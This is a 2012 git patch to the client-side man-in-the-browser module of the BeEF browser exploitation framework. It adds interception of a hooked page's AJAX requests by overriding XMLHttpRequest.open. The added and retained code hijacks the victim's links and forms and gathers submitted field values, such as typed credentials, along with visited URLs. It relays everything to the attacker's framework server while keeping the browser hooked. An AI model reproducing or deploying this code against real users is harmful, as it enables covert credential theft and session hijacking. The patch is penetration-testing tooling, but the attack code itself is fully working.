From a0c11fa695ff0783a371506eda90dc17eaf03b0a Mon Sep 17 00:00:00 2001
From: radoen <scream1988@gmail.com>
Date: Fri, 9 Mar 2012 16:10:04 +0100
Subject: [PATCH] Added support to intercept dynamic requests

---
 core/main/client/mitb.js | 313 ++++++++++++++++++++++++---------------
 1 file changed, 195 insertions(+), 118 deletions(-)

diff --git a/core/main/client/mitb.js b/core/main/client/mitb.js
index bfad2b6d4..e3db90c00 100644
--- a/core/main/client/mitb.js
+++ b/core/main/client/mitb.js
@@ -15,121 +15,198 @@
 //
 
 beef.mitb = {
-	
-	cid: null,
-	curl: null,
-	
-	init: function(cid, curl){
-		beef.mitb.cid = cid;
-		beef.mitb.curl = curl;
-	},
-	
-	// Initializes the hook on anchors and forms.
-	hook: function(){ 	
-		beef.onpopstate.push(function(event) {beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);});
-		beef.onclose.push(function(event) {beef.mitb.endSession();});
-		var anchors = document.getElementsByTagName("a");
-		var forms = document.getElementsByTagName("form");
-		for(var i=0;i<anchors.length;i++){
-			anchors[i].onclick = beef.mitb.poisonAnchor;
-		}
-		for(var i=0;i<forms.length;i++){
-			beef.mitb.poisonForm(forms[i]);
-		}
-	},
-	
-	// Hooks anchors and prevents them from linking away
-	poisonAnchor: function(e){
-		try{
-			e.preventDefault;
-			if(beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])){
-				var title = "";
-				if(document.getElementsByTagName("title").length == 0){
-					title = document.title;
-				}else{
-					title = document.getElementsByTagName("title")[0].innerHTML;
-				}
-				history.pushState({ Be: "EF" }, title, e.currentTarget);
-			}
-		}catch(e){
-			console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
-		}
-		return false;
-	},
-	
-	// Hooks forms and prevents them from linking away
-	poisonForm: function(form){
-		form.onsubmit=function(e){
-			var inputs = form.getElementsByTagName("input");
-			var query = "";
-			for(var i=0;i<inputs.length;i++){
-				if(i>0 && i<inputs.length-1) query += "&";
-				switch(inputs[i].type){
-					case "submit":
-						break;
-					default:
-						query += inputs[i].name + "=" + inputs[i].value;
-						break;
-				}
-			}
-			e.preventdefault;
-			beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
-			history.pushState({ Be: "EF" }, "", form.action);
-			return false;
-		}
-	},
-	
-	// Fetches a hooked form with AJAX
-	fetchForm: function(url, query, target){
-		try{
-			var y = new XMLHttpRequest();
-			y.open('POST', url, false);
-			y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
-			y.onreadystatechange = function(){
-				if(y.readyState == 4 && y.responseText != ""){
-					target.innerHTML = y.responseText;
-					setTimeout(beef.mitb.hook, 10);
-				}
-			}
-			y.send(query);
-			beef.mitb.sniff("POST: "+url+" ["+query+"]");
-			return true;
-		}catch(x){
-			return false;
-		}
-	},
-	
-	// Fetches a hooked link with AJAX
-	fetch: function(url, target){
-		try{
-			var y = new XMLHttpRequest();
-			y.open('GET', url,false);
-			y.onreadystatechange = function(){
-				if(y.readyState == 4 && y.responseText != ""){
-					target.innerHTML = y.responseText;
-					setTimeout(beef.mitb.hook, 10);
-				}
-			}
-			y.send(null);
-			beef.mitb.sniff("GET: "+url);
-			return true;
-		}catch(x){
-			window.open(url);
-			beef.mitb.sniff("GET [New Window]: "+url);
-			return false;
-		}
-	},
-	
-	// Relays an entry to the framework
-	sniff: function(result){
-		try{
-			beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
-		}catch(x){}
-		return true;
-	},
-	
-	// Signals the Framework that the user has lost the hook
-	endSession: function(){
-		beef.mitb.sniff("Window closed.");
-	}
-}
+
+    cid:null,
+    curl:null,
+
+    init:function (cid, curl) {
+        beef.mitb.cid = cid;
+        beef.mitb.curl = curl;
+        /*Override open method to intercept ajax request*/
+        var xml_type;
+
+        if (window.XMLHttpRequest && !(window.ActiveXObject)) {
+
+            xml_type = 'XMLHttpRequest';
+        }
+
+        if (xml_type == "XMLHttpRequest") {
+            beef.mitb.sniff("Method XMLHttpRequest.open override");
+            (function (open) {
+                XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
+
+                    var portRegex = new RegExp(":[0-9]+");
+                    var portR = portRegex.exec(url);
+                    /*return :port*/
+                    var requestPort;
+
+                    if (portR != null) {
+                        requestPort = portR[0].split(":");
+                    }
+
+                    if ((user == "beef") && (pass == "beef")) {
+                        /*a poisoned something*/
+                        open.call(this, method, url, async, null, null);
+                    }
+
+
+                    else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
+                        /*a beef hook.js polling or dh */
+                        open.call(this, method, url, async, null, null);
+                    }
+
+                    else {
+
+                        if (method == "GET") {
+                            if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
+                                beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
+                                window.open(url);
+
+                            }
+                            else {
+                                beef.mitb.sniff("GET [Ajax Request]: " + url);
+                                if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
+                                    var title = "";
+                                    if (document.getElementsByTagName("title").length == 0) {
+                                        title = document.title;
+                                    } else {
+                                        title = document.getElementsByTagName("title")[0].innerHTML;
+                                    }
+                                    /*write the url of the page*/
+                                    history.pushState({ Be:"EF" }, title, url);
+
+                                }
+
+                            }
+
+                        }
+                        else {
+                            /*if we are here we have an ajax post req*/
+                            beef.mitb.sniff("Post ajax request to: " + url);
+                            open.call(this, method, url, async, user, pass);
+
+                        }
+                    }
+                };
+            })(XMLHttpRequest.prototype.open);
+
+        }
+
+    },
+
+    // Initializes the hook on anchors and forms.
+    hook:function () {
+        beef.onpopstate.push(function (event) {
+            beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
+        });
+        beef.onclose.push(function (event) {
+            beef.mitb.endSession();
+        });
+
+        var anchors = document.getElementsByTagName("a");
+        var forms = document.getElementsByTagName("form");
+        for (var i = 0; i < anchors.length; i++) {
+            anchors[i].onclick = beef.mitb.poisonAnchor;
+        }
+        for (var i = 0; i < forms.length; i++) {
+            beef.mitb.poisonForm(forms[i]);
+        }
+    },
+
+    // Hooks anchors and prevents them from linking away
+    poisonAnchor:function (e) {
+        try {
+            e.preventDefault;
+            if (beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])) {
+                var title = "";
+                if (document.getElementsByTagName("title").length == 0) {
+                    title = document.title;
+                } else {
+                    title = document.getElementsByTagName("title")[0].innerHTML;
+                }
+                history.pushState({ Be:"EF" }, title, e.currentTarget);
+            }
+        } catch (e) {
+            console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
+        }
+        return false;
+    },
+
+    // Hooks forms and prevents them from linking away
+    poisonForm:function (form) {
+        form.onsubmit = function (e) {
+            var inputs = form.getElementsByTagName("input");
+            var query = "";
+            for (var i = 0; i < inputs.length; i++) {
+                if (i > 0 && i < inputs.length - 1) query += "&";
+                switch (inputs[i].type) {
+                    case "submit":
+                        break;
+                    default:
+                        query += inputs[i].name + "=" + inputs[i].value;
+                        break;
+                }
+            }
+            e.preventdefault;
+            beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
+            history.pushState({ Be:"EF" }, "", form.action);
+            return false;
+        }
+    },
+
+    // Fetches a hooked form with AJAX
+    fetchForm:function (url, query, target) {
+        try {
+            var y = new XMLHttpRequest();
+            y.open('POST', url, false, "beef", "beef");
+            y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+            y.onreadystatechange = function () {
+                if (y.readyState == 4 && y.responseText != "") {
+                    target.innerHTML = y.responseText;
+                    setTimeout(beef.mitb.hook, 10);
+                }
+            }
+            y.send(query);
+            beef.mitb.sniff("POST: " + url + " [" + query + "]");
+            return true;
+        } catch (x) {
+            return false;
+        }
+    },
+
+    // Fetches a hooked link with AJAX
+    fetch:function (url, target) {
+        try {
+            var y = new XMLHttpRequest();
+            y.open('GET', url, false, "beef", "beef");
+            y.onreadystatechange = function () {
+                if (y.readyState == 4 && y.responseText != "") {
+
+                    target.innerHTML = y.responseText;
+                    setTimeout(beef.mitb.hook, 10);
+                }
+            }
+            y.send(null);
+            beef.mitb.sniff("GET: " + url);
+            return true;
+        } catch (x) {
+            window.open(url);
+            beef.mitb.sniff("GET [New Window]: " + url);
+            return false;
+        }
+    },
+
+    // Relays an entry to the framework
+    sniff:function (result) {
+        try {
+            beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
+        } catch (x) {
+        }
+        return true;
+    },
+
+    // Signals the Framework that the user has lost the hook
+    endSession:function () {
+        beef.mitb.sniff("Window closed.");
+    }
+}
\ No newline at end of file